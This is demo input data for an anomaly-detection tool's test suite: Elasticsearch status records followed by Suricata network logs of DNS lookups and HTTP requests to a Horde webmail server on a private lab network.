{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"LzP1LXYBIkOurnXX2Ik0","_score":1.0,"_source":{"FromTime":1.607088844951758E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":9,"/parser/model/type_str":538,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:34:14.989Z","ToTime":1.607088854951834E9,"fromtimestamp":"2020-12-04T13:34:04.951Z","totimestamp":"2020-12-04T13:34:14.951Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"NTP1LXYBIkOurnXX_4nQ","_score":1.0,"_source":{"FromTime":1.607088855090159E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":10,"/parser/model/type_str":653,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:34:25.129Z","ToTime":1.607088865090244E9,"fromtimestamp":"2020-12-04T13:34:15.090Z","totimestamp":"2020-12-04T13:34:25.090Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"OjP2LXYBIkOurnXXJ4lZ","_score":1.0,"_source":{"FromTime":1.607088865212616E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":5,"/parser/model/type_str":502,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:34:35.250Z","ToTime":1.607088875212694E9,"fromtimestamp":"2020-12-04T13:34:25.212Z","totimestamp":"2020-12-04T13:34:35.212Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"PjP2LXYBIkOurnXXT4n4","_score":1.0,"_source":{"FromTime":1.607088875611484E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":5,"/parser/model/type_str":2205,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":2,"/parser/model/sp":0},"timestamp":"2020-12-04T13:34:45.649Z","ToTime":1.607088885611568E9,"fromtimestamp":"2020-12-04T13:34:35.611Z","totimestamp":"2020-12-04T13:34:45.611Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"RDP2LXYBIkOurnXXeIkn","_score":1.0,"_source":{"FromTime":1.607088885898558E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":10,"/parser/model/type_str":1542,"/parser/model/php":0,"/parser/model/status_code":2,"/parser/model/host":2,"/parser/model/sp":0},"timestamp":"2020-12-04T13:34:55.936Z","ToTime":1.607088895898649E9,"fromtimestamp":"2020-12-04T13:34:45.898Z","totimestamp":"2020-12-04T13:34:55.898Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"SDP2LXYBIkOurnXXoYl8","_score":1.0,"_source":{"FromTime":1.607088896465222E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":13,"/parser/model/type_str":3152,"/parser/model/php":0,"/parser/model/status_code":3,"/parser/model/host":2,"/parser/model/sp":0},"timestamp":"2020-12-04T13:35:06.517Z","ToTime":1.607088906465292E9,"fromtimestamp":"2020-12-04T13:34:56.465Z","totimestamp":"2020-12-04T13:35:06.465Z","version":"1"}}]}} logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminerJsonInputDemo/json_logs/eve.json000066400000000000000000077225771500476301700313610ustar00rootroot00000000000000{"timestamp":"2020-02-29T00:00:01.041456+0000","flow_id":387009461891405,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46406,"proto":"UDP","dns":{"type":"answer","id":22103,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:01.041456+0000","flow_id":387009461891405,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46406,"proto":"UDP","dns":{"type":"answer","id":22103,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:00:01.126898+0000","flow_id":1265931569107445,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34680,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4768}} {"timestamp":"2020-02-29T00:00:02.592153+0000","flow_id":1136275096733977,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35290,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":31668,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:00:02.626782+0000","flow_id":741056500184452,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52612,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-delete.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":117},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button-delete.png","state":"CLOSED","stored":false,"size":117,"tx_id":16}} {"timestamp":"2020-02-29T00:00:02.697211+0000","flow_id":1136275096733977,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35290,"proto":"UDP","dns":{"type":"answer","id":31668,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:02.697211+0000","flow_id":1136275096733977,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35290,"proto":"UDP","dns":{"type":"answer","id":31668,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:00:02.763084+0000","flow_id":741056500184452,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52612,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":233,"tx_id":17}} {"timestamp":"2020-02-29T00:00:02.774030+0000","flow_id":741056500184452,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52612,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":17,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":4383}} {"timestamp":"2020-02-29T00:00:02.953009+0000","flow_id":741056500184452,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52612,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":4383},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":20182,"tx_id":17}} {"timestamp":"2020-02-29T00:00:02.955593+0000","flow_id":741056500184452,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52612,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":18,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/alerts\/success.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":469}} {"timestamp":"2020-02-29T00:00:03.906662+0000","flow_id":1193329442411942,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35660,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":16131,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:00:04.000257+0000","flow_id":1959100616671748,"event_type":"flow","src_ip":"192.168.10.122","src_port":53493,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:55:02.459268+0000","end":"2020-02-28T23:55:02.570517+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:04.000559+0000","flow_id":2248594297295235,"event_type":"flow","src_ip":"192.168.10.122","src_port":34133,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:55:01.889219+0000","end":"2020-02-28T23:55:02.000453+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:04.012140+0000","flow_id":1193329442411942,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35660,"proto":"UDP","dns":{"type":"answer","id":16131,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:04.012140+0000","flow_id":1193329442411942,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35660,"proto":"UDP","dns":{"type":"answer","id":16131,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:00:04.125348+0000","flow_id":715535805556464,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34682,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?actionID=add_task","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8620}} {"timestamp":"2020-02-29T00:00:06.000412+0000","event_type":"stats","stats":{"uptime":13658,"capture":{"kernel_packets":131656,"kernel_drops":0},"decoder":{"pkts":131666,"bytes":91548095,"invalid":175,"ipv4":130251,"ipv6":8,"ethernet":131666,"raw":0,"null":0,"sll":0,"tcp":125327,"udp":4735,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":695,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096768},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2642,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2658,"synack":2649,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":134,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1689,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2157,"failed_udp":106},"tx":{"http":4364,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2233}},"flow_mgr":{"closed_pruned":2614,"new_pruned":15,"est_pruned":2207,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":1,"flows_timeout":2,"flows_timeout_inuse":0,"flows_removed":2,"rows_checked":65536,"rows_skipped":65533,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18849,"memcap_state":0,"memcap_global":0},"http":{"memuse":173458,"memcap":0}}} {"timestamp":"2020-02-29T00:00:06.130347+0000","flow_id":1265931569107445,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34680,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4768},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/","state":"CLOSED","stored":false,"size":20083,"tx_id":1}} {"timestamp":"2020-02-29T00:00:07.959552+0000","flow_id":741056500184452,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52612,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/alerts\/success.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":469},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/alerts\/success.png","state":"CLOSED","stored":false,"size":469,"tx_id":18}} {"timestamp":"2020-02-29T00:00:09.000169+0000","flow_id":1174723640053537,"event_type":"flow","src_ip":"192.168.10.130","src_port":34672,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1095,"bytes_toclient":6516,"start":"2020-02-28T23:59:02.216865+0000","end":"2020-02-28T23:59:07.421832+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:00:09.131516+0000","flow_id":715535805556464,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34682,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?actionID=add_task","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8620},"app_proto":"http","fileinfo":{"filename":"\/nag\/task.php","state":"CLOSED","stored":false,"size":34777,"tx_id":0}} {"timestamp":"2020-02-29T00:00:09.579471+0000","flow_id":1310461790902159,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":44297,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":62651,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:00:09.690288+0000","flow_id":1310461790902159,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44297,"proto":"UDP","dns":{"type":"answer","id":62651,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:09.690288+0000","flow_id":1310461790902159,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44297,"proto":"UDP","dns":{"type":"answer","id":62651,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:00:09.744651+0000","flow_id":937559845345076,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52622,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3423}} {"timestamp":"2020-02-29T00:00:11.000743+0000","flow_id":1483686392296336,"event_type":"flow","src_ip":"192.168.10.122","src_port":41143,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:55:10.848784+0000","end":"2020-02-28T23:55:10.956521+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:11.001125+0000","flow_id":953872111526551,"event_type":"flow","src_ip":"192.168.10.122","src_port":46841,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:55:10.746135+0000","end":"2020-02-28T23:55:10.857663+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:11.906251+0000","flow_id":937559845345076,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52622,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3423},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":18034,"tx_id":0}} {"timestamp":"2020-02-29T00:00:11.917081+0000","flow_id":2128300873612889,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":33617,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":48664,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:00:12.027870+0000","flow_id":2128300873612889,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33617,"proto":"UDP","dns":{"type":"answer","id":48664,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:12.027870+0000","flow_id":2128300873612889,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33617,"proto":"UDP","dns":{"type":"answer","id":48664,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:00:12.138061+0000","flow_id":937559845345076,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52622,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3798}} {"timestamp":"2020-02-29T00:00:12.183305+0000","flow_id":937559845345076,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52622,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3798},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":20554,"tx_id":1}} {"timestamp":"2020-02-29T00:00:12.186770+0000","flow_id":937559845345076,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52622,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2951}} {"timestamp":"2020-02-29T00:00:12.188718+0000","flow_id":67704414066182,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52624,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/basic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1633}} {"timestamp":"2020-02-29T00:00:12.224277+0000","flow_id":937559845345076,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52622,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2951},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/screen.css","state":"CLOSED","stored":false,"size":12657,"tx_id":2}} {"timestamp":"2020-02-29T00:00:12.224594+0000","flow_id":67704414066182,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52624,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/basic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1633},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/basic\/screen.css","state":"CLOSED","stored":false,"size":6255,"tx_id":0}} {"timestamp":"2020-02-29T00:00:12.226518+0000","flow_id":1743257055554502,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52626,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-right-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":161}} {"timestamp":"2020-02-29T00:00:12.265633+0000","flow_id":67704414066182,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52624,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-center-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":103}} {"timestamp":"2020-02-29T00:00:12.265685+0000","flow_id":937559845345076,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52622,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-left-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":179}} {"timestamp":"2020-02-29T00:00:12.310542+0000","flow_id":937559845345076,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52622,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-left-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 